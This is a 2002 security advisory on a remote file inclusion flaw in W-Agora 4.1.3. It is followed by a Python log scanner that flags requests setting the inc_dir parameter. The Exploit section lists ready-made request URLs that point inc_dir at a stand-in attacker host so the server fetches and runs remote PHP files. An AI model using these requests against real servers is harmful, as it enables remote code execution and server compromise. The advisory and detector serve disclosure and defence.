W-Agora remote file injection



14th Jun 2002 [SBWID-5450]
COMMAND

	W-Agora remote file injection

SYSTEMS AFFECTED

	W-Agora 4.1.3

PROBLEM

	frog-m@n [leseulfrog@hotmail.com] found that it is possible to inject
	arbitrary files on a server running W-Agora.
	

	Exploit
	=======

	- With a file http://www.attacker.com/dbaccess.txt :

	http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt

	http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt

	http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt

	http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt

	http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt

	

	- With a file http://www.attacker.com/postgres65.txt :

	http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt

	

	- With the file http://www.attacker.com/auth.txt :

	http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt

	http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt

	

	

	More details in French:
	

	http://www.ifrance.com/kitetoua/tuto/W-Agora.txt

	

	

	Translated by Google:
	

	http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

	

SOLUTION

	Nothing yet.
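
With no fix listed, access logs can be checked for requests that set `inc_dir` on the scripts named above. The following is an added example, not part of the original advisory or of W-Agora: it assumes common/combined log format and that a legitimate client never supplies `inc_dir`; the log lines, hosts and the function names `classify` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script paths named in the advisory as accepting inc_dir and ext.
AFFECTED = (
    "/include/oci8.php", "/include/postgres65.php", "/include/mysql.php",
    "/include/mssql7.php", "/include/msql.php", "/include/postgres.php",
    "/user/agora_user.php", "/user/ldap_example.php",
)
# Request line of a common/combined log format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A URL scheme or a protocol-relative "//" means inc_dir points off-host.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.IGNORECASE)

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jun/2002:10:00:01 +0000] "GET /include/mysql.php?inc_dir=http://files.example&ext=txt HTTP/1.0" 200 512',
    '192.0.2.11 - - [14/Jun/2002:10:00:05 +0000] "GET /user/agora_user.php?inc_dir=http%3A%2F%2Ffiles.example&ext=txt HTTP/1.0" 200 512',
    '192.0.2.12 - - [14/Jun/2002:10:01:00 +0000] "GET /include/oci8.php?inc_dir=../tmp&ext=txt HTTP/1.0" 200 90',
    '192.0.2.13 - - [14/Jun/2002:10:02:00 +0000] "GET /index.php?site=demo HTTP/1.0" 200 4096',
]


def classify(line):
    """Return 'remote', 'override' or None for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = re.sub(r"/+", "/", unquote(url.path)).lower()
    # Substring match also covers trailing PATH_INFO after the script name.
    if not any(p in path for p in AFFECTED):
        return None
    # PHP maps '.' and ' ' in parameter names to '_', so normalise the key.
    values = [v for k, vs in parse_qs(url.query, keep_blank_values=True).items()
              if k.replace(".", "_").replace(" ", "_") == "inc_dir" for v in vs]
    if not values:
        return None
    # parse_qs decoded once; decode again to catch double-encoded values.
    if any(REMOTE_RE.match(unquote(v)) for v in values):
        return "remote"
    return "override"  # inc_dir set by the client, but not to a remote URL


def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]
```

A `remote` verdict matches the pattern in the advisory; `override` marks any other client-supplied `inc_dir` and is worth reviewing as well.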

